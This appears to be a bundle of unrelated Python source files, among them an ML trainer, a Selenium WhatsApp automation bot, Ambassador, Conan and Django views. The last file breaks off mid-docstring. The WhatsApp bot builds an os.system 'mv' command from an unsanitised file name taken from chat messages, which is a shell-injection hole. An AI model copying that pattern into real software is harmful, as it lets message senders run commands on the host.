for key in list(metrics.keys()):
if not key.startswith(f"{metric_key_prefix}_"):
metrics[f"{metric_key_prefix}_{key}"] = metrics.pop(key)
self.log(metrics)
else:
metrics = {}
if self.args.tpu_metrics_debug or self.args.debug:
# tpu-comment: Logging debug metrics for PyTorch/XLA (compile, execute times, ops, etc.)
xm.master_print(met.metrics_report())
self.control = self.callback_handler.on_evaluate(self.args, self.state, self.control, metrics)
return metrics
def predict(self, predict_dataset, predict_examples, ignore_keys=None, metric_key_prefix: str = "test"):
predict_dataloader = self.get_test_dataloader(predict_dataset)
# Temporarily disable metric computation, we will do it in the loop here.
compute_metrics = self.compute_metrics
self.compute_metrics = None
eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop
try:
output = eval_loop(
predict_dataloader,
description="Prediction",
# No point gathering the predictions if there are no metrics, otherwise we defer to
# self.args.prediction_loss_only
prediction_loss_only=True if compute_metrics is None else None,
ignore_keys=ignore_keys,
)
finally:
self.compute_metrics = compute_metrics
if self.post_process_function is None or self.compute_metrics is None:
return output
predictions = self.post_process_function(predict_examples, predict_dataset, output.predictions, "predict")
metrics = self.compute_metrics(predictions)
# Prefix all keys with metric_key_prefix + '_'
for key in list(metrics.keys()):
if not key.startswith(f"{metric_key_prefix}_"):
metrics[f"{metric_key_prefix}_{key}"] = metrics.pop(key)
return PredictionOutput(predictions=predictions.predictions, label_ids=predictions.label_ids, metrics=metrics)
def save_onnx(self, output_dir="./"):
eval_dataset = self.eval_dataset
eval_dataloader = self.get_eval_dataloader(eval_dataset)
batch = next(iter(eval_dataloader))
# saving device - to make it consistent
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# convert to tuple
input_tuple = tuple(v.to(device) for k, v in batch.items())
logger.info("Converting model to be onnx compatible")
from pytorch_quantization.nn import TensorQuantizer
TensorQuantizer.use_fb_fake_quant = True
model = self.model.to(device)
model.eval()
model.float()
model_to_save = model.module if hasattr(model, "module") else model
quant_trainer.configure_model(model_to_save, self.quant_trainer_args)
output_model_file = os.path.join(output_dir, "model.onnx")
logger.info(f"exporting model to {output_model_file}")
axes = {0: "batch_size", 1: "seq_len"}
torch.onnx.export(
model_to_save,
input_tuple,
output_model_file,
export_params=True,
opset_version=13,
do_constant_folding=True,
input_names=["input_ids", "attention_mask", "token_type_ids"],
output_names=["output_start_logits", "output_end_logits"],
dynamic_axes={
"input_ids": axes,
"attention_mask": axes,
"token_type_ids": axes,
"output_start_logits": axes,
"output_end_logits": axes,
},
verbose=True,
)
logger.info("onnx export finished")
|
from __future__ import print_function
import time
from html.parser import HTMLParser
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import sys
import re
from profanity_check import predict, predict_prob
from bs4 import BeautifulSoup
import datetime
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import threading
'''
Awesomeness lent from: https://github.com/dhruvramani/Makeathon-18
'''
driver = webdriver.Firefox(executable_path=r'./Gecko/geckodriver')
driver.get("https://web.whatsapp.com/")
time.sleep(2)
wait = WebDriverWait(driver, 600)
SCOPES = ['https://www.googleapis.com/auth/calendar']
def strip_tags(html):
return re.sub('<[^<]+?>', '', html)
def search_downloads(file_name):
while(1):
if file_name in os.listdir(os.path.join(os.path.expanduser("~"), "Downloads")):
subject = file_name.split('_')[0]
if not os.path.exists('{}/Notes/{}'.format(os.path.expanduser('~'), subject)):
os.mkdir('{}/Notes/{}'.format(os.path.expanduser('~'), subject))
os.system('mv {}/Downloads/{} {}/Notes/{}/{}'.format(os.path.expanduser('~'), file_name, os.path.expanduser('~'), subject, file_name))
break
def create_event(event_string, type):
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('calendar', 'v3', credentials=creds)
if(type==0):
mesg = event_string.split("\n")
print(mesg)
if "tomorrow" in mesg[0].lower():
start_date = str(datetime.date.today() + datetime.timedelta(days=1))
end_date = str(datetime.date.today() + datetime.timedelta(days=1))
elif "today" in mesg[0].lower():
start_date = str(datetime.date.today())
end_date = str(datetime.date.today())
classroom = mesg[1]
mesg = mesg[2:]
for line in mesg:
line = line.split(" ")
time = line[0]
course = line[2]
time = time.split("-")
if(len(time[0])==2):
start_time = '{}:00'.format(time[0])
else:
start_time = time[0]
if(len(time[1])==2):
end_time = '{}:00'.format(time[1])
else:
end_time = time[1]
event = {
'summary': course,
'location': classroom,
'description': course,
'start': {
'dateTime': '{}T{}:00+05:30'.format(start_date, start_time),
},
'end': {
'dateTime': '{}T{}:00+05:30'.format(end_date, end_time),
},
}
print(event)
event = service.events().insert(calendarId='primary', body=event).execute()
print('Event created: {}'.format(event.get('htmlLink')))
else:
mesg = event_string.split("\n")
print(mesg)
date_time = mesg[1].split(" ")
event_loc = mesg[2]
event_name = mesg[3]
start_date = date_time[0]
end_date = date_time[0]
start_time = date_time[1].split("-")[0]
end_time = date_time[1].split("-")[1]
event = {
'summary': event_name,
'location': event_loc,
'description': event_name,
'start': {
'dateTime': '{}T{}:00+05:30'.format(start_date, start_time),
},
'end': {
'dateTime': '{}T{}:00+05:30'.format(end_date, end_time),
},
}
print(event)
event = service.events().insert(calendarId='primary', body=event).execute()
print('Event created: {}'.format(event.get('htmlLink')))
# date yyyy-mm-dd, time 24 hrs format
def send_message(target, string):
#x_arg = '//span[contains(@title,' + target + ')]'
x_arg = '//span[@title=' + target + ']'
print(x_arg)
group_title = wait.until(EC.presence_of_element_located((By.XPATH, x_arg)))
print(group_title.get_attribute('innerHTML'))
group_title.click()
inp_xpath = '//*[@id="main"]/footer/div[1]/div[2]/div/div[2]'
input_box = wait.until(EC.presence_of_element_located((By.XPATH, inp_xpath)))
print(input_box)
string = string.replace('\n', Keys.SHIFT + Keys.ENTER + Keys.SHIFT)
input_box.send_keys(string + Keys.ENTER)
def mainMessage(sleep=0):
time.sleep(sleep)
rightChatBoxes = driver.find_elements_by_css_selector("._2ko65")
print(rightChatBoxes)
i = 1
for rightChatBox in rightChatBoxes:
soup = BeautifulSoup(rightChatBox.get_attribute('innerHTML'), 'html.parser')
print(soup.prettify())
name = soup.select("._19RFN")[0].get('title')
mesg_time = soup.select("._0LqQ")[0].get_text()
chatHead = driver.find_elements_by_css_selector(".P6z4j")[0]
no_messages = int(chatHead.get_attribute('innerHTML'))
print(no_messages)
rightChatBox.click()
if i == 1:
time.sleep(sleep)
i = i+1
try :
messages = driver.find_elements_by_css_selector("._F7Vk")[-no_messages:] #_2Wx_5 _3LG3B #_12pGw
print(messages)
for message in messages:
mesg = strip_tags(message.get_attribute('innerHTML'))
print(mesg)
if ".pdf" in mesg:
download_buttons = driver.find_elements_by_css_selector("._1mrMQ")[-no_messages:] #[0].click() #_1zGQT oty3x #_1mrMQ
for download_button in download_buttons:
if mesg in download_button.get_attribute('innerHTML'):
download_button.click()
t1 = threading.Thread(target=search_downloads, args=(mesg,))
t1.start()
break
#print(download_button)
else:
message.click()
mlist = []
mlist.append(mesg)
is_offensive = predict(mlist)[0]
if is_offensive:
driver.find_elements_by_css_selector("._2-qoA")[0].click() #
print("click1")
driver.find_element(By.XPATH, '//*[@title="Star message"]').click()
print("click2")
send_message("'Offensive'", "{} @ {} : {}".format(name, mesg_time, mesg))
if "timetable" in mesg.lower():
create_event(mesg, 0)
send_message("'Timetable'", mesg)
if "event" in mesg.lower():
create_event(mesg, 1)
except Exception as e:
print(e)
pass
count = 4
while 1:
mainMessage(count)
time.sleep(1)
count = 0
time.sleep(10)
driver.quit()
|
from typing import Any, Dict, List, Optional, Tuple, Union, TYPE_CHECKING
from ..config import Config
from ..resource import Resource
from ..utils import RichStatus
if TYPE_CHECKING:
from .ir import IR
class IRResource (Resource):
"""
A resource within the IR.
"""
@staticmethod
def helper_sort_keys(res: 'IRResource', k: str) -> Tuple[str, List[str]]:
return k, list(sorted(res[k].keys()))
@staticmethod
def helper_rkey(res: 'IRResource', k: str) -> Tuple[str, str]:
return '_rkey', res[k]
@staticmethod
def helper_list(res: 'IRResource', k: str) -> Tuple[str, list]:
return k, list([ x.as_dict() for x in res[k] ])
__as_dict_helpers: Dict[str, Any] = {
"apiVersion": "drop",
"logger": "drop",
"ir": "drop"
}
_active: bool
_errored: bool
def __init__(self, ir: 'IR', aconf: Config,
rkey: str,
kind: str,
name: str,
namespace: Optional[str]=None,
metadata_labels: Optional[str]=None,
location: str = "--internal--",
apiVersion: str="ambassador/ir",
**kwargs) -> None:
# print("IRResource __init__ (%s %s)" % (kind, name))
if not namespace:
namespace = ir.ambassador_namespace
self.namespace = namespace
super().__init__(rkey=rkey, location=location,
kind=kind, name=name, namespace=namespace, metadata_labels=metadata_labels,
apiVersion=apiVersion,
**kwargs)
self.ir = ir
self.logger = ir.logger
self._errored = False
self.__as_dict_helpers = IRResource.__as_dict_helpers
self.add_dict_helper("_errors", IRResource.helper_list)
self.add_dict_helper("_referenced_by", IRResource.helper_sort_keys)
self.add_dict_helper("rkey", IRResource.helper_rkey)
# Make certain that _active has a default...
self.set_active(False)
# ...before we override it with the setup results.
self.set_active(self.setup(ir, aconf))
def lookup(self, key: str, *args, default_class: Optional[str]=None, default_key: Optional[str]=None) -> Any:
"""
Look up a key in this IRResource, with a fallback to the Ambassador module's "defaults"
element.
Here's the resolution order:
- if key is present in self, use its value.
- if not, we'll try to look up a fallback value in the Ambassador module:
- the key for the lookup will be the value of "default_key" if that's set,
otherwise the same key we just tried in self.
- if "default_class" wasn't passed in, and self.default_class isn't set, just
look up a fallback value from the "defaults" dict in the Ambassador module.
- otherwise, look up the default class in Ambassador's "defaults", then look up
the fallback value from that dict (the passed in "default_class" wins if both
are set).
- (if the default class is '/', explictly skip descending into a sub-directory)
- if no key is present in self, and no fallback is found, but a default value was passed
in as *args[0], return that.
- if all else fails, return None.
:param key: the key to look up
:param default_class: the default class for the fallback lookup (optional, see above)
:param default_key: the key for the fallback lookup (optional, defaults to key)
:param args: an all-else-fails default value can go here, see above
:return: Any
"""
value = self.get(key, None)
default_value = None
if len(args) > 0:
default_value = args[0]
if value is None:
get_from = self.ir.ambassador_module.get('defaults', {})
dfl_class = default_class
if not dfl_class:
dfl_class = self.get('default_class', None)
if dfl_class and (dfl_class != '/'):
get_from = get_from.get(dfl_class, None)
if get_from:
if not default_key:
default_key = key
value = get_from.get(default_key, default_value)
else:
value = default_value
return value
def add_dict_helper(self, key: str, helper) -> None:
self.__as_dict_helpers[key] = helper
def set_active(self, active: bool) -> None:
self._active = active
def is_active(self) -> bool:
return self._active
def __bool__(self) -> bool:
return self._active and not self._errored
def setup(self, ir: 'IR', aconf: Config) -> bool:
# If you don't override setup, you end up with an IRResource that's always active.
return True
def add_mappings(self, ir: 'IR', aconf: Config) -> None:
# If you don't override add_mappings, uh, no mappings will get added.
pass
def post_error(self, error: Union[str, RichStatus]):
self._errored = True
if not self.ir:
raise Exception("post_error cannot be called before __init__")
self.ir.post_error(error, resource=self)
# super().post_error(error)
# self.ir.logger.error("%s: %s" % (self, error))
def skip_key(self, k: str) -> bool:
if k.startswith('__') or k.startswith("_IRResource__"):
return True
if self.__as_dict_helpers.get(k, None) == 'drop':
return True
return False
def as_dict(self) -> Dict:
od: Dict[str, Any] = {}
for k in self.keys():
if self.skip_key(k):
continue
helper = self.__as_dict_helpers.get(k, None)
if helper:
new_k, v = helper(self, k)
if new_k and v:
od[new_k] = v
elif isinstance(self[k], IRResource):
od[k] = self[k].as_dict()
elif self[k] is not None:
od[k] = self[k]
return od
@staticmethod
def normalize_service(service: str) -> str:
normalized_service = service
if service.lower().startswith("http://"):
normalized_service = service[len("http://"):]
elif service.lower().startswith("https://"):
normalized_service = service[len("https://"):]
return normalized_service
|
from conans import DEFAULT_REVISION_V1
from conans.model.ref import PackageReference
class CommonService(object):
def _get_latest_pref(self, pref):
ref = self._get_latest_ref(pref.ref)
pref = PackageReference(ref, pref.id)
tmp = self._server_store.get_last_package_revision(pref)
if not tmp:
prev = DEFAULT_REVISION_V1
else:
prev = tmp.revision
return pref.copy_with_revs(ref.revision, prev)
def _get_latest_ref(self, ref):
tmp = self._server_store.get_last_revision(ref)
if not tmp:
rrev = DEFAULT_REVISION_V1
else:
rrev = tmp.revision
return ref.copy_with_rev(rrev)
def remove_conanfile(self, ref):
self._authorizer.check_delete_conan(self._auth_user, ref)
self._server_store.remove_conanfile(ref)
def remove_packages(self, ref, package_ids_filter):
"""If the revision is not specified it will remove the packages from all the recipes
(v1 compatibility)"""
for package_id in package_ids_filter:
pref = PackageReference(ref, package_id)
self._authorizer.check_delete_package(self._auth_user, pref)
if not package_ids_filter: # Remove all packages, check that we can remove conanfile
self._authorizer.check_delete_conan(self._auth_user, ref)
for rrev in self._server_store.get_recipe_revisions(ref):
self._server_store.remove_packages(ref.copy_with_rev(rrev.revision),
package_ids_filter)
def remove_package(self, pref):
self._authorizer.check_delete_package(self._auth_user, pref)
for rrev in self._server_store.get_recipe_revisions(pref.ref):
new_pref = pref.copy_with_revs(rrev.revision, pref.revision)
for prev in self._server_store.get_package_revisions(new_pref):
full_pref = new_pref.copy_with_revs(rrev.revision, prev.revision)
self._server_store.remove_package(full_pref)
def remove_all_packages(self, ref):
for rrev in self._server_store.get_recipe_revisions(ref):
self._server_store.remove_all_packages(ref.copy_with_rev(rrev.revision))
def remove_conanfile_files(self, ref, files):
self._authorizer.check_delete_conan(self._auth_user, ref)
self._server_store.remove_conanfile_files(ref, files)
def remove_conanfile_file(self, ref, path):
self.remove_conanfile_files(ref, [path])
|
from .functional import RipsDiagram, Rips0Diagram
import torch.nn as nn
class RipsLayer(nn.Module):
"""
Define a Rips persistence layer that will use the Rips Diagram function
Inpute:
maxdim : maximum homology dimension (default=0)
reduction_flags : PH computation options from bats
see details in:
https://bats-tda.readthedocs.io/en/latest/tutorials/Rips.html#Algorithm-optimization
"""
def __init__(self, maxdim = 0, degree = -1, metric = 'euclidean', sparse = False, eps=0.5, reduction_flags=()):
super(RipsLayer, self).__init__()
self.maxdim = maxdim
self.degree = degree
self.sparse = sparse
self.eps = eps
self.PD = RipsDiagram()
self.metric = metric
self.reduction_flags = reduction_flags
def forward(self, x):
xnp = x.cpu().detach().numpy() # convert to numpy array
dgms = self.PD.apply(x, self.maxdim, self.degree, self.metric , self.sparse, self.eps, *self.reduction_flags)
return dgms
class Rips0Layer(nn.Module):
"""
Define a Rips persistence layer that will use the Rips Diagram function
Only computes dimension 0 using Union-Find
"""
def __init__(self, metric = 'euclidean'):
super(Rips0Layer, self).__init__()
self.metric = metric
self.PD = Rips0Diagram()
def forward(self, x):
xnp = x.cpu().detach().numpy() # convert to numpy array
dgms = self.PD.apply(x, self.metric)
return dgms
|
from genessa.models.simple import SimpleCell
from .mutation import Mutation
class SimpleModel(SimpleCell, Mutation):
"""
Class defines a cell with a single protein state subject to negative feedback. All reaction rates are based on linear propensity functions.
Attributes:
name (str) - name of controlled gene
Inherited Attributes:
transcripts (dict) - {name: node_id} pairs
proteins (dict) - {name: node_id} pairs
phosphorylated (dict) - {name: node_id} pairs
nodes (np.ndarray) - vector of node indices
node_key (dict) - {state dimension: node id} pairs
reactions (list) - list of reaction objects
stoichiometry (np.ndarray) - stoichiometric coefficients, (N,M)
N (int) - number of nodes
M (int) - number of reactions
I (int) - number of inputs
"""
def __init__(self,
name='X',
k=1,
g=1,
lambda_g=0,
lambda_k=0):
"""
Instantiate a simple model of a single protein.
Args:
name (str) - name of controlled protein
k (float) - protein synthesis rate constant
g (float) - protein decay rate constant
lambda_g (float) - degradation growth rate dependence
lambda_k (float) - synthesis growth rate dependence
"""
self.name = name
# instantiate linear cell with a single gene activated by the input
gene_kw = dict(g=g, growth_dependence=lambda_g)
super().__init__(genes=(self.name,), I=1, **gene_kw)
# add synthesis driven by input
self.add_activation(protein=self.name,
activator='IN',
k=k,
growth_dependence=lambda_k)
def add_post_translational_feedback(self,
k=None,
atp_sensitive=2,
carbon_sensitive=2,
ribosome_sensitive=1,
growth_dependence=0,
**kwargs):
"""
Adds linear negative feedback applied to protein level.
Args:
k (float) - rate parameter (feedback strength)
atp_sensitive (int) - order of metabolism dependence
carbon_sensitive (int) - order of carbon availability dependence
ribosome_sensitive (int) - order of ribosome dependence
growth_dependence (float) - log k / log growth
kwargs: keyword arguments for reaction
"""
self.add_linear_feedback(
sensor=self.name,
target=self.name,
mode='protein',
k=k,
atp_sensitive=atp_sensitive,
carbon_sensitive=carbon_sensitive,
ribosome_sensitive=ribosome_sensitive,
growth_dependence=growth_dependence,
**kwargs)
def add_feedback(self, eta, perturbed=False, lambda_eta=0):
"""
Add feedback.
Args:
eta (float) - feedback strength
perturbed (bool) - if True, feedback is sensitive to perturbation
lambda_eta (float) - feedback growth rate dependence
"""
self.add_post_translational_feedback(
k=eta,
perturbed=perturbed,
growth_dependence=lambda_eta)
|
import contextlib
import numpy as np
import torch
from torch import nn
from transformers import BertForNextSentencePrediction
from capreolus import ConfigOption, Dependency
from capreolus.reranker import Reranker
from capreolus.utils.loginit import get_logger
logger = get_logger(__name__)
# official weights converted with:
# def convert(name):
# from transformers import BertTokenizer, BertForNextSentencePrediction, TFBertForNextSentencePrediction
# tokenizer = BertTokenizer.from_pretrained("bert-large-uncased")
# state = torch.load(f"/GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/saved.{name}_1", map_location="cpu")
# model = BertForNextSentencePrediction.from_pretrained("bert-large-uncased")
# model.load_state_dict(state["model"].state_dict())
# output = f"/GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/export/birch-bert-large-{name}"
# os.makedirs(output, exist_ok=True)
# model.save_pretrained(output)
# tokenizer.save_pretrained(output)
# # tf2 support
# tf_model = TFBertForNextSentencePrediction.from_pretrained(output, from_pt=True)
# tf_model.save_pretrained(output)
class Birch_Class(nn.Module):
def __init__(self, extractor, config):
super().__init__()
self.config = config
if config["hidden"] == 0:
self.combine = nn.Linear(config["topk"], 1, bias=False)
with torch.no_grad():
self.combine.weight = nn.Parameter(torch.ones_like(self.combine.weight) / config["topk"])
else:
assert config["hidden"] > 0
self.combine = nn.Sequential(nn.Linear(config["topk"], config["hidden"]), nn.ReLU(), nn.Linear(config["hidden"], 1))
# original model file (requires apex):
# state = torch.load("/GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/saved.msmarco_mb_1", map_location="cpu")
# self.bert = state["model"]
# saved.msmarco_mb_1 weights exported from the official apex model:
# self.bert = BertForNextSentencePrediction.from_pretrained("bert-large-uncased")
# self.bert.load_state_dict(torch.load("/GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/converted"))
# converted_weights.msmarco_mb
# kevin's base model:
# self.bert = BertForNextSentencePrediction.from_pretrained("bert-base-uncased")
# saved_bert = torch.load("/GW/NeuralIR/nobackup/birch/models/saved.tmp_1")["model"]
# self.bert.load_state_dict(saved_bert.state_dict())
# also /GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/export/birch-bert-base-kevin
self.bert = BertForNextSentencePrediction.from_pretrained(f"Capreolus/birch-bert-large-{config['pretrained']}")
if not config["finetune"]:
self.bert.requires_grad = False
self.bert_context = torch.no_grad
else:
self.bert_context = contextlib.nullcontext
def forward(self, doc, seg, mask):
batch = doc.shape[0]
with self.bert_context():
bi_scores = [self.score_passages(doc[bi], seg[bi], mask[bi], batch) for bi in range(batch)]
scores = torch.stack(bi_scores)
assert scores.shape == (batch, self.config["extractor"]["numpassages"], 2)
scores = scores[:, :, 1] # take second output
topk, _ = torch.topk(scores, dim=1, k=self.config["topk"])
doc_score = self.combine(topk)
return doc_score
def score_passages(self, doc, seg, mask, batch):
needed_passages = doc.shape[0]
maxlen = doc.shape[-1]
# find instances that contain a document (segment B)
# for unmasked tokens in seg B, seg+mask=2
# there are always two SEPs in segment B, so the document is not empty if there are >= 3 tokens where seg+mask=2
valid = ((seg + mask) == 2).sum(dim=1) > 2
if not any(valid):
valid[0] = True
doc, seg, mask = doc[valid], seg[valid], mask[valid]
out = []
batches = np.ceil(doc.shape[0] / batch).astype(int)
for bi in range(batches):
start = bi * batch
stop = (bi + 1) * batch
sb_doc, sb_seg, sb_mask = doc[start:stop], seg[start:stop], mask[start:stop]
# find first non-padding token and shorten batch to this length
idx = (sb_seg + sb_mask).argmax(dim=1).max()
sb_doc = sb_doc[:, : idx + 1]
sb_seg = sb_seg[:, : idx + 1]
sb_mask = sb_mask[:, : idx + 1]
# for idx in reversed(range(maxlen)):
# if any(sb_mask[:, idx]):
# sb_doc = sb_doc[:, : idx + 1]
# sb_seg = sb_seg[:, : idx + 1]
# sb_mask = sb_mask[:, : idx + 1]
# break
sb_scores = self.bert(input_ids=sb_doc, token_type_ids=sb_seg, attention_mask=sb_mask)
sb_scores = sb_scores[0] # for new bert output
out.append(sb_scores)
real_out = torch.cat(out, dim=0)
found_passages = real_out.shape[0]
if found_passages < needed_passages:
pad_out = torch.min(real_out, dim=0)[0].repeat(needed_passages - found_passages, 1)
return torch.cat((real_out, pad_out), dim=0)
else:
return real_out
@Reranker.register
class Birch(Reranker):
module_name = "birch"
config_spec = [
ConfigOption("topk", 3, "top k scores to use"),
ConfigOption("hidden", 0, "size of hidden layer or 0 to take the weighted sum of the topk"),
ConfigOption("finetune", False, "fine-tune the BERT model"),
ConfigOption("pretrained", "msmarco_mb", "pretrained Birch model to load: mb, msmarco_mb, or car_mb"),
]
dependencies = [
Dependency(
key="extractor",
module="extractor",
name="bertpassage",
default_config_overrides={"tokenizer": {"pretrained": "bert-large-uncased"}},
),
Dependency(key="trainer", module="trainer", name="pytorch"),
]
def build_model(self):
self.model = Birch_Class(self.extractor, self.config)
return self.model
def score(self, d):
return [
self.model(d["pos_bert_input"], d["pos_seg"], d["pos_mask"]).view(-1),
self.model(d["neg_bert_input"], d["neg_seg"], d["neg_mask"]).view(-1),
]
def test(self, d):
return self.model(d["pos_bert_input"], d["pos_seg"], d["pos_mask"]).view(-1)
|
from django.core.exceptions import ImproperlyConfigured
from django.contrib import messages
from django.utils.translation import ugettext_lazy as _, ugettext
from django.views.generic.edit import FormMixin, ProcessFormView, DeletionMixin, FormView
from django_mongoengine.forms.documents import documentform_factory
from django_mongoengine.views.detail import (SingleDocumentMixin, DetailView,
SingleDocumentTemplateResponseMixin, BaseDetailView)
class DocumentFormMixin(FormMixin, SingleDocumentMixin):
"""
A mixin that provides a way to show and handle a documentform in a request.
"""
success_message = None
def get_form_class(self):
"""
Returns the form class to use in this view
"""
if self.form_class:
return self.form_class
else:
if hasattr(self, 'object') and self.object is not None:
# If this view is operating on a single object, use
# the class of that object
document = self.object.__class__
elif self.document is not None:
# If a document has been explicitly provided, use it
document = self.document
else:
# Try to get a queryset and extract the document class
# from that
document = self.get_queryset()._document
exclude = getattr(self, 'form_exclude', ())
return documentform_factory(document, exclude=exclude)
def get_form_kwargs(self):
"""
Returns the keyword arguments for instanciating the form.
"""
kwargs = super(DocumentFormMixin, self).get_form_kwargs()
kwargs.update({'instance': self.object})
return kwargs
def get_success_url(self):
if self.success_url:
url = self.success_url % self.object._data
else:
try:
url = self.object.get_absolute_url()
except AttributeError:
raise ImproperlyConfigured(
"No URL to redirect to. Either provide a url or define"
" a get_absolute_url method on the document.")
return url
def form_valid(self, form):
self.object = form.save()
document = self.document or form.Meta.document
msg = _("The %(verbose_name)s was updated successfully.") % {
"verbose_name": document._meta.verbose_name}
msg = self.success_message if self.success_message else msg
messages.add_message(self.request, messages.SUCCESS, msg, fail_silently=True)
return super(DocumentFormMixin, self).form_valid(form)
def get_context_data(self, **kwargs):
context = kwargs
if self.object:
context['object'] = self.object
context_object_name = self.get_context_object_name(self.object)
if context_object_name:
context[context_object_name] = self.object
return context
class EmbeddedFormMixin(FormMixin):
"""
A mixin that provides a way to show and handle a documentform in a request.
"""
embedded_form_class = None
embedded_context_name = 'embedded_form'
def get_form_class(self):
"""
Returns the form class to use in this view
"""
if self.embedded_form_class:
return self.embedded_form_class
else:
raise ImproperlyConfigured(
"No embedded form class provided. An embedded form class must be provided.")
def get_form(self, form_class):
"""
Returns an instance of the form to be used in this view.
"""
object = getattr(self, 'object', self.get_object())
return form_class(object, **self.get_form_kwargs())
def get_embedded_object(self):
"""
Returns an instance of the embedded object. By default this is a freshly created
instance. Override for something cooler.
"""
if hasattr(self, 'embedded_object'):
return self.embedded_object()
else:
klass = self.get_form_class()
return klass.Meta.document()
def get_form_kwargs(self):
"""
Returns the keyword arguments for instantiating the form.
"""
kwargs = super(EmbeddedFormMixin, self).get_form_kwargs()
object = self.get_embedded_object()
kwargs.update({'instance': object})
if not 'initial' in kwargs:
kwargs['initial'] = {}
return kwargs
def get_success_url(self):
object = getattr(self, 'object', self.get_object())
if self.success_url:
url = self.success_url % object.__dict__
else:
try:
url = object.get_absolute_url()
except AttributeError:
raise ImproperlyConfigured(
"No URL to redirect to. Either provide a url or define"
" a get_absolute_url method on the document.")
return url
def form_valid(self, form):
self.embedded_object = form.save()
return super(EmbeddedFormMixin, self).form_valid(form)
def get_context_data(self, **kwargs):
context = super(EmbeddedFormMixin, self).get_context_data(**kwargs)
object = getattr(self, 'object', self.get_object())
if 'form' in kwargs:
form = kwargs['form']
else:
form = self.get_form(self.get_form_class())
context[self.embedded_context_name] = form
return context
class ProcessEmbeddedFormMixin(object):
"""
A mixin that processes an embedded form on POST.
Does not implement any GET handling.
"""
def post(self, request, *args, **kwargs):
self.object = self.get_object()
form_class = self.get_form_class()
form = self.get_form(form_class)
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
super(ProcessEmbeddedFormMixin, self).post(request, *args, **kwargs)
class BaseEmbeddedFormMixin(EmbeddedFormMixin, ProcessEmbeddedFormMixin):
"""
A Mixin that handles an embedded form on POST and
adds the form into the template context.
"""
class BaseCreateView(DocumentFormMixin, ProcessFormView):
"""
Base view for creating an new object instance.
Using this base class requires subclassing to provide a response mixin.
"""
def get(self, request, *args, **kwargs):
self.object = None
return super(BaseCreateView, self).get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
self.object = None
return super(BaseCreateView, self).post(request, *args, **kwargs)
class CreateView(SingleDocumentTemplateResponseMixin, BaseCreateView):
"""
View for creating an new object instance,
with a response rendered by template.
"""
template_name_suffix = '_form'
class BaseUpdateView(DocumentFormMixin, ProcessFormView):
"""
Base view for updating an existing object.
Using this base class requires subclassing to provide a response mixin.
"""
def get(self, request, *args, **kwargs):
self.object = self.get_object()
return super(BaseUpdateView, self).get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
self.object = self.get_object()
return super(BaseUpdateView, self).post(request, *args, **kwargs)
class UpdateView(SingleDocumentTemplateResponseMixin, BaseUpdateView):
"""
View for updating an object,
with a response rendered by template..
"""
template_name_suffix = '_form'
class BaseDeleteView(DeletionMixin, BaseDetailView):
"""
Base view for deleting an object.
Using this base class requires subclassing to provide a response mixin.
"""
class DeleteView(SingleDocumentTemplateResponseMixin, BaseDeleteView):
"""
View for deleting an object retrieved with `self.get_object()`,
with a response rendered by template.
"""
template_name_suffix = '_confirm_delete'
class EmbeddedDetailView(BaseEmbeddedFormMixin, DetailView):
"""
Renders the detail view of a document and and adds a
form for an embedded object into the template.
See BaseEmbeddedFormMixin for details on the form.
"""
def get_context_data(self, **kwargs):
# manually call parents get_context_data without super
# currently django messes up the super mro chain
# and for multiple inheritance only one tree is followed
context = BaseEmbeddedFormMixin.get_context_data(self, **kwargs)
context.update(DetailView.get_context_data(self, **kwargs))
return context
|
class StatesStatus:
STATUS_NOT_SET = 0
NEW = 1
ACCEPTED = 2
COMPLETED = 3
DECLINED = 4
CANCELLED = 5
CLOSED = 6
STATE_STATUS_CHOICES = (
(StatesStatus.STATUS_NOT_SET, 'Status Not Set'),
(StatesStatus.NEW, 'New'),
(StatesStatus.ACCEPTED, 'Accepted'),
(StatesStatus.COMPLETED, 'Completed'),
(StatesStatus.DECLINED, 'Decline'),
(StatesStatus.CANCELLED, 'Cancelled'),
(StatesStatus.CLOSED, 'Closed')
)
class PriorityStatus:
STATUS_NOT_SET = 0
HIGH = 1
MEDIUM = 2
LOW = 3
PRIORITY_CHOICES = (
(PriorityStatus.STATUS_NOT_SET, 'Status Not Set'),
(PriorityStatus.HIGH, 'High'),
(PriorityStatus.MEDIUM, 'Medium'),
(PriorityStatus.LOW, 'Low')
)
|
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import warnings
from trackintel.geogr.distances import meters_to_decimal_degrees
from trackintel.visualization.osm import plot_osm_streets
from trackintel.visualization.util import regular_figure, save_fig
from trackintel.geogr.distances import check_gdf_planar
def plot_locations(
locations,
out_filename=None,
radius=150,
positionfixes=None,
staypoints=None,
staypoints_radius=100,
plot_osm=False,
axis=None,
):
"""Plot locations (optionally to a file).
Optionally, you can specify several other datasets to be plotted beneath the locations.
Parameters
----------
locations : GeoDataFrame (as trackintel locations)
The locations to plot.
out_filename : str, optional
The file to plot to, if this is not set, the plot will simply be shown.
radius : float, default 150 (meter)
The radius in meter with which circles around locations should be drawn.
positionfixes : GeoDataFrame (as trackintel positionfixes), optional
If available, some positionfixes that can additionally be plotted.
staypoints : GeoDataFrame (as trackintel staypoints), optional
If available, some staypoints that can additionally be plotted.
staypoints_radius : float, default 100 (meter)
The radius in meter with which circles around staypoints should be drawn.
plot_osm : bool, default False
If this is set to True, it will download an OSM street network and plot
below the staypoints.
